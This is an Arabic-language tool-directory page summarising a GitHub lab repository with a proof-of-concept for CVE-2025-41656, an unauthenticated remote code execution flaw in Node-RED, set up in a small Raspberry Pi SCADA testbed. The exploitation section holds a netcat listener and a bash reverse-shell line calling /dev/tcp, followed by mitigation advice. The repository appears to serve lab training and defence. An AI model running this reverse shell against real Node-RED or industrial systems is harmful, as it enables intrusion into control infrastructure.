Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-41656 — يتضمن هذا المستودع الكود والملفات اللازمة لاختبار وتنفيذ PoC لـ CVE-2025-41656 | Kitploit
أدوات/GitHubGitHub/wallyschag/cve-2025-41656
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSالتعلم والتعليممختبرات وتدريب عملي
GitHubwallyschag/cve-2025-41656

CVE-2025-41656

يتضمن هذا المستودع الكود والملفات اللازمة لاختبار وتنفيذ PoC لـ CVE-2025-41656

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-41656

ملخص المشروع

هذا المشروع موجود لنمذجة CVE-2025-41656، وهي ثغرة تنفيذ كود عن بعد غير مصادق عليها لـ NodeRED. لنمذجة هذه الثغرة، قمنا بإنشاء نظام SCADA صغير الحجم باستخدام Raspberry Pi ومحرك ومستشعر. يحتوي Raspberry Pi على حاوية NodeRED وحاوية OpenPLC تتواصلان مع بعضهما عبر Modbus TCP للتحكم في المحرك. هذا نص بايثون لإثبات المفهوم لتنفيذ هجوم CVE-2025-41656. الهدف هو إنشاء PoC بنجاح وإيجاد إجراءات علاجية لتأمين النظام.

البدء

سيتضمن المختبر القطع التالية

  • Rasberry Pi 3b+
  • ملف Docker Compose مع حاويات NodeRED و OpenPLC
  • محرك
  • مستشعر
  • جهاز آلي يتحكم به المحرك
  • ملاحظة: يختلف الإعداد حسب الأجهزة المتوفرة لديك. قم بالتعديل وفقًا لذلك.

تثبيت البرامج

root@kitploit:~
git clone [email protected]:wallyschag/CVE-2025-41656.git
cd CVE-2025-41656
git clone https://github.com/thiagoralves/OpenPLC_v3.git

إعداد Docker

root@kitploit:~
rm OpenPLC_v3/Dockerfile && cp Dockerfile_WiringPi OpenPLC_v3/Dockerfile
docker compose up --build -d
  • تحقق من أن حاويات Docker وجسر الشبكة قيد التشغيل
root@kitploit:~
docker container ls
docker network inspect csci587-final-project_scadanet
  • يجب أن تكون كلا حاويتي Docker قيد التشغيل.
  • تأكد أيضًا من أن كلا الحاويتين متصلتان بالشبكة ولديهما عنوان IP مخصص.

الاستغلال

  • على الجهاز المضيف، قم بتشغيل nc -lvnp 1234
  • قم بتغيير NODE_RED_IP و NODE_RED_PORT بعنوان IP والمنفذ (1880) لخدمة NodeRED الخاصة بك في cve_2025_41656.py.
  • داخل cve_2025_41656، قم بتغيير عنوان IP في السطر "command": "bash -c 'bash -i >& /dev/tcp/192.168.4.223/1234 0>&1'", إلى عنوان IP للجهاز الذي تقوم بتشغيل الاستغلال منه.
root@kitploit:~
python3 cve_2025_41656.py
  • يجب أن يكون لديك الآن شل عكسي على حاوية NodeRED.

استراتيجيات التخفيف

  • قم بتطبيق TLS وآلية مصادقة لـ NodeRED.
  • قم بتقسيم شبكات SCADA لمنع الوصول غير المصرح به إلى NodeRED.
  • راقب الشبكات التي تحتوي على NodeRED باستخدام أنظمة IDS/IPS بحثًا عن حركة مرور الشل العكسي.
تنزيل الأداة